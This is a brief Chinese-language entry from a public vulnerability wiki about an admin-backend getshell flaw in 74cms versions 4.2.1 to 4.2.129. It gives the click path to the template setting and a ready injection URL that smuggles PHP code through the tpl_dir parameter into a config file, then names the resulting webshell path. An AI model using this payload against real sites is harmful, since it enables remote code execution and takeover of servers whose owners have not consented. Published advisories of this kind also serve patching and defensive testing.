Loading
0

74cms v4.2.1-v4.2.129 后台getshell漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

漏洞利用

管理面板-风格模板-工具-点击可用模板抓包

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'

webshell:http://74cms.test/Application/Home/Conf/config.php


\74cms\upload\Application\Home\Conf\config.php

免费、自由、人人可编辑的漏洞库--PwnWiki.com